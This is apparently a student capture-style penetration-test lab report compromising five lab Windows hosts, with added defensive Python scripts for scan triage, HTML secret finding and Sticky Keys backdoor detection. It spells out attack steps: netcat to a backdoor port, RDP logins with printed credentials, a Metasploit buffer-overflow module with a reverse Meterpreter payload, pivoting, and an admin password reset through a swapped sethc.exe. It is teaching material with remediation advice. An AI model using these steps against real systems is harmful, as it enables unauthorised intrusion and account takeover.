
NTS330

Final Lab - Exploitation


DECEMBER 10, 2017
BY: LIVIA NGUYEN, MARK LAROCQUE, VIRGIL WYLIE
Contents

Summary
Information Gathering
Port Scan Results
Exploitation
    Box #1
    Box #2
    Box #3
    Box #4
    Box #5
Recommendation
Reference
Summary

This lab documents a penetration test against five target machines and shows how each one was compromised. The report records the team's progress on each machine and the different methods used. The work has three phases. The first is information gathering, to find out which hosts are on the network. The second is port scanning, to find the hosts that expose open ports and are therefore exposed to attack. The third is exploitation, in which the port scan results are used to choose an approach for each system and attack the five boxes.

Information Gathering

Based on the ifconfig output of the attacking machine, the targets are on the 10.113.113.0/24 network (10.113.113.1-255).

Target IP addresses (low to high)

1. 10.113.113.1
2. 10.113.113.10
3. 10.113.113.15
4. 10.113.113.20
5. 10.113.113.50
6. 10.113.113.51
7. 10.113.113.100
8. 10.113.113.101
9. 10.113.113.102
10. 10.113.113.103
11. 10.113.113.105
12. 10.113.113.108
13. 10.113.113.109
14. 10.113.113.110
15. 10.113.113.112
16. 10.113.113.113
17. 10.113.113.114
18. 10.113.113.115
19. 10.113.113.116

The list above contains every host that responded on the 10.113.113.0/24 network. The port scan shows that five of them (10.113.113.10, 10.113.113.15, 10.113.113.20, 10.113.113.50 and 10.113.113.51, highlighted in red in the original report) have open ports and are therefore exposed to some degree and worth attacking. The scan also tells us exactly which ports, and so which services, to go after on each system.


Port Scan Results
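As an added example (not part of the lab report), the script below does the triage step described above in code: it parses nmap's grepable output (`-oG`, a real nmap option; a scan of the lab range would be run as `nmap -sS -p- -oG scan.gnmap 10.113.113.0/24`) and keeps only the hosts that actually have open ports, sorted low to high the way the report lists them. The scan lines in SAMPLE_GNMAP are constructed for illustration and are not the team's real results.

```python
"""Triage nmap grepable (-oG) output: list live hosts and their open ports.

Added example, not code from the lab report. SAMPLE_GNMAP is a constructed
stand-in for a real scan file; hosts with only filtered/closed ports are dropped.
"""
import re
from collections import OrderedDict

# Constructed sample in nmap -oG format (hosts/ports are illustrative only).
SAMPLE_GNMAP = """\
# Nmap 7.60 scan initiated Sun Dec 10 10:00:00 2017 as: nmap -sS -oG scan.gnmap 10.113.113.0/24
Host: 10.113.113.1 ()\tStatus: Up
Host: 10.113.113.1 ()\tPorts: 53/filtered/tcp//domain///\tIgnored State: closed (999)
Host: 10.113.113.10 ()\tStatus: Up
Host: 10.113.113.10 ()\tPorts: 1337/open/tcp//unknown///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (998)
Host: 10.113.113.15 ()\tStatus: Up
Host: 10.113.113.15 ()\tPorts: 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (998)
Host: 10.113.113.100 ()\tStatus: Up
Host: 10.113.113.100 ()\tPorts: 22/closed/tcp//ssh///\tIgnored State: closed (999)
# Nmap done at Sun Dec 10 10:05:00 2017 -- 256 IP addresses (4 hosts up) scanned in 300.00 seconds
"""

# One port entry is port/state/protocol/owner/service/rpcinfo/version/ ;
# we capture port, state, protocol and service (versions containing commas are not handled).
PORT_RE = re.compile(r"(\d+)/([^/]+)/(\w+)/[^/,]*/([^/,]*)/[^/,]*/[^/,]*/")


def parse_gnmap(text):
    """Return {host: [(port, proto, state, service), ...]} for every 'Host:' line carrying 'Ports:'."""
    hosts = OrderedDict()
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comments and bare 'Status: Up' lines carry no port data
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            hosts.setdefault(host, []).append((int(port), proto, state, service))
    return hosts


def hosts_with_open_ports(text):
    """Return {host: [(port, service), ...]} keeping only hosts with at least one open port."""
    result = OrderedDict()
    for host, entries in parse_gnmap(text).items():
        open_ports = [(p, svc) for p, proto, state, svc in entries if state == "open"]
        if open_ports:
            result[host] = sorted(open_ports)
    return result


def sort_ip(hosts):
    """Sort dotted-quad addresses numerically (low to high), not lexically."""
    return sorted(hosts, key=lambda ip: tuple(int(o) for o in ip.split(".")))


if __name__ == "__main__":
    targets = hosts_with_open_ports(SAMPLE_GNMAP)
    for host in sort_ip(targets):
        ports = ", ".join(f"{p}/{svc or '?'}" for p, svc in targets[host])
        print(f"{host}: {ports}")
```

The unknown service on 1337 shows up in the output exactly as nmap reports it, which is the cue that led to box #1 below.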
Exploitation

Box #1

Address: 10.113.113.10

The nmap scan listed port 1337 on 10.113.113.10 as an unknown service, so I connected to it with telnet (telnet 10.113.113.10 1337). The port is a backdoor that drops straight into a command console; netcat (nc 10.113.113.10 1337) works just as well for getting access to the host. Once inside the console I browsed the C:\ drive of the machine and found a text file with a hint on how to get to the next target.
Box #2

Address: 10.113.113.15

Looking through the source of the website on 10.113.113.15, it appears that the user saved the username and password for their workstation login in the HTML. Since port 3389 is open on this machine, RDP can be used to connect remotely with the credentials found in the page source. Run rdesktop 10.113.113.15 to reach the login screen of box #2 and enter admin as the username and Th1sIS@SecureP@ssw0rd as the password to get access to the machine. A text file on the desktop describes the extra step needed to get to the next box.
Box #3

Address: 10.113.113.20

The website on 10.113.113.20 shows that it is running Disk Pulse Enterprise 9.9.16. Following the last hint, we searched Exploit-DB, found the Metasploit module "Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow" (EDB-ID 42767) and downloaded it to the attacking machine. The module was added to msfconsole (copied into the local Metasploit module directory and reloaded) and used against 10.113.113.20. set RHOST 10.113.113.20 sets the target address, and show options confirms that it has been set. set PAYLOAD windows/meterpreter/reverse_tcp selects a reverse Meterpreter payload, and set LHOST followed by our own address tells that payload where to connect back to. Running exploit successfully drops into a Meterpreter session; sysinfo there shows the operating system and host details, and shell opens a Windows command prompt on the machine.
Box #4

Address: 10.113.113.50

The plan is to use the Meterpreter session on box #3 and portfwd to set up a pivot point and exploit box #4 through it. Looking through the web source of 10.113.113.50, there is a unique string that appears to be base64 encoded. Searching for the string on DuckDuckGo (results shown in the original screenshot) suggested that it is base64; decoding it confirms this directly. I used the box #3 session to establish a pivot between my machine and 10.113.113.20 and attacked box #4 through it, then decoded the string found in the website source and used it as the login password for the server. I connected to the server over port 3389 with rdesktop 10.113.113.50 and logged in with those credentials (with a Meterpreter portfwd, rdesktop is pointed at the locally forwarded port, which relays the connection to 10.113.113.50:3389). The username for the server is administrator and the password is the decoded form of the encoded string found in the website source: 82qgTtG64O#51En7!9Ib91c4D69NDt5$.
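Boxes #2, #3 and #4 were all given away by what a "view source" on their web pages revealed: a product and version string, credentials left in a comment, and a base64-encoded password. As an added example (not code from the lab report), the script below triages a page's HTML for all three at once. It also replaces the "search the string on a web search engine" step with a direct check: strict base64 decoding plus a printable-text test, which rejects look-alikes such as hex digests. SAMPLE_HTML, the credential values in it and the regular expressions are all constructed for illustration; no string below is a real credential.

```python
"""Triage a page's HTML source for a version banner, credentials in comments,
and base64-encoded secrets.

Added example, not code from the lab report. SAMPLE_HTML and every value in it
are constructed; the regexes are heuristics, not an exhaustive scanner.
"""
import base64
import re

CONSTRUCTED_SECRET = "N0tTheRealOne!"   # constructed stand-in for the decoded password
ENCODED_SECRET = base64.b64encode(CONSTRUCTED_SECRET.encode()).decode()

# Constructed page source resembling what a quick "view source" would show.
SAMPLE_HTML = f"""<!DOCTYPE html>
<html><head><title>Disk Pulse Enterprise 9.9.16</title></head>
<body>
<!-- TODO remove before go-live: workstation login  user: admin  password: N0tTheRealOne! -->
<h1>Status page</h1>
<p>Build checksum: d41d8cd98f00b204e9800998ecf8427e</p>
<!-- admin backup: {ENCODED_SECRET} -->
</body></html>
"""

# "Product Name 1.2.3" or "Product_Name_1.2.3": the input for an Exploit-DB search.
VERSION_RE = re.compile(r"\b([A-Z][A-Za-z]*(?:[ _][A-Z][A-Za-z]*)*)[ _]v?(\d+(?:\.\d+){1,3})\b")
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
CRED_RE = re.compile(r"\b(user(?:name)?|login|pass(?:word|wd)?|pwd)\s*[:=]\s*(\S+)", re.I)
# Runs of base64 alphabet of at least 16 chars, optionally padded, not glued to other base64 chars.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def find_versions(html):
    """Return (product, version) pairs found anywhere in the page."""
    return [(name.replace("_", " "), ver) for name, ver in VERSION_RE.findall(html)]


def find_credentials_in_comments(html):
    """Return (key, value) pairs that look like credentials inside HTML comments."""
    found = []
    for comment in COMMENT_RE.findall(html):
        found.extend((k.lower(), v) for k, v in CRED_RE.findall(comment))
    return found


def try_decode_base64(token):
    """Return decoded text if token is well-formed base64 of printable text, else None.

    Length must be a multiple of 4, the alphabet is validated, and the result must
    decode as UTF-8 printable text; random-looking hex digests fail these checks.
    """
    if len(token) % 4 != 0:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def find_base64_secrets(html):
    """Return (encoded, decoded) pairs for every base64-looking token that decodes to text."""
    results = []
    for token in B64_RE.findall(html):
        decoded = try_decode_base64(token)
        if decoded is not None:
            results.append((token, decoded))
    return results


def triage(html):
    """Run all three checks and return their findings keyed by check name."""
    return {
        "versions": find_versions(html),
        "credentials": find_credentials_in_comments(html),
        "base64": find_base64_secrets(html),
    }


if __name__ == "__main__":
    for section, items in triage(SAMPLE_HTML).items():
        print(section)
        for item in items:
            print("   ", item)
```

On a real target the HTML would come from the response body (for example `curl -s http://10.113.113.50/`) rather than from the constructed sample; base64 is an encoding, not encryption, so anything found by the last check is effectively plaintext.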


Box #5

Address: 10.113.113.51

The port scan shows that port 3389 (RDP) is open, so we can connect to it remotely as with boxes #2 and #4. At the Windows 10 login screen, pressing the Shift key five times triggers the Sticky Keys accessibility shortcut, and on this machine that opened a command prompt instead of the Sticky Keys dialog. net user lists the accounts on the machine; the only non-default account is oldchap, which means oldchap is the admin account. net user oldchap 123456 resets oldchap's password to 123456, and entering that username and the new password at the login screen gives access to the machine.
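A command prompt appearing when Shift is pressed five times at the login screen means the Sticky Keys helper has been tampered with: either sethc.exe in System32 was replaced with a copy of cmd.exe, or an Image File Execution Options "Debugger" registry value redirects it to another program. As an added example (not code from the lab report), the script below checks a System32 directory for both indicators, generalized to the other Windows accessibility binaries that are abused the same way (utilman.exe, osk.exe and the rest listed in ACCESSIBILITY_BINARIES, all real Windows executables). The IFEO key path is the real one; the temp-directory fixture used by the demo is constructed and stands in for a real System32 tree.

```python
r"""Detect the accessibility-binary (Sticky Keys) backdoor seen on box #5.

Added example, not code from the lab report. Two indicators:
  1. an accessibility binary in System32 is byte-identical to cmd.exe (swapped);
  2. an Image File Execution Options "Debugger" value redirects it (not swapped,
     but another program is launched in its place).
build_constructed_system32() creates a constructed stand-in directory for the
demo; on a real host pass r"C:\Windows\System32" and read_ifeo_debuggers().
"""
import hashlib
import os
import tempfile

# Binaries reachable from the Windows login screen that are commonly swapped for cmd.exe.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe")
IFEO_BASE = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def read_ifeo_debuggers(names=ACCESSIBILITY_BINARIES):
    """Return {binary: Debugger value} for names with an IFEO Debugger set; {} off Windows."""
    try:
        import winreg  # only available on Windows
    except ImportError:
        return {}
    found = {}
    for name in names:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_BASE + "\\" + name) as key:
                found[name] = winreg.QueryValueEx(key, "Debugger")[0]
        except OSError:
            pass  # no IFEO key or no Debugger value for this binary: the normal case
    return found


def accessibility_backdoor_indicators(system32_dir, ifeo_debuggers=None):
    """Return human-readable findings; an empty list means no indicator was found."""
    findings = []
    cmd = os.path.join(system32_dir, "cmd.exe")
    if not os.path.isfile(cmd):
        return ["cmd.exe missing: cannot compare binaries"]
    cmd_hash = sha256_of(cmd)
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32_dir, name)
        # Not every Windows build ships every binary, so a missing one is not a finding.
        if os.path.isfile(path) and sha256_of(path) == cmd_hash:
            findings.append(f"{name} is identical to cmd.exe: accessibility binary replaced")
    for name, debugger in (ifeo_debuggers or {}).items():
        findings.append(f"IFEO Debugger set for {name}: {debugger}")
    return findings


def build_constructed_system32(backdoored):
    """Create a constructed System32 look-alike in a temp dir (demo fixture, not a real tree)."""
    d = tempfile.mkdtemp(prefix="fake_system32_")
    cmd_bytes = b"MZ constructed cmd.exe stand-in"
    sethc_bytes = cmd_bytes if backdoored else b"MZ constructed sethc.exe stand-in"
    with open(os.path.join(d, "cmd.exe"), "wb") as f:
        f.write(cmd_bytes)
    with open(os.path.join(d, "sethc.exe"), "wb") as f:
        f.write(sethc_bytes)
    return d


if __name__ == "__main__":
    for label, backdoored in (("clean fixture", False), ("backdoored fixture", True)):
        print(label, accessibility_backdoor_indicators(build_constructed_system32(backdoored)) or ["no indicators"])
    if os.name == "nt":
        real = accessibility_backdoor_indicators(r"C:\Windows\System32", read_ifeo_debuggers())
        print("this host:", real or ["no indicators"])
```

A hash match against cmd.exe catches the common swap; an attacker could just as well copy powershell.exe or a custom binary in, so comparing each accessibility binary against its known-good hash (or running sfc /scannow) is the more complete check. The remediation is to restore the original binary, delete the Debugger value, and keep the login screen from reaching any shell.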


Recommendation

I would recommend that the company check for and remove any open backdoors. Box #1 had a backdoor listening on port 1337 that I could walk straight into with nc or telnet. On box #2, leaving the admin account's credentials in a web page on a system with RDP (port 3389) exposed is not a good idea, because anyone who reads the page source can connect remotely and log in with them. Box #3 was the most secure of the boxes so far, but having Disk Pulse Enterprise 9.9.16 installed made it vulnerable: an exploit written specifically for that version is publicly available on Exploit-DB, and I was able to compromise the box through port 80 with that downloaded exploit. I then set up a pivot between box #3 and my machine to attack box #4, whose credentials were sitting base64-encoded in the website source; base64 is an encoding, not encryption, so decoding the string gave me the login for the server. Box #5 could be logged into by resetting a password from a command prompt opened through the Sticky Keys shortcut at the login screen. A Shift-five-times prompt at the login screen means the Sticky Keys binary (sethc.exe) has been replaced with, or redirected to, cmd.exe, so the fix is to restore the original binary and remove the redirection, disable the Sticky Keys shortcut on the login screen, and make sure that nobody can reach a command prompt without first logging into the machine.
Reference

Metasploit. (2017, September 21). Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit). Exploit-DB, EDB-ID 42767. Retrieved December 10, 2017, from https://www.exploit-db.com/exploits/42767/
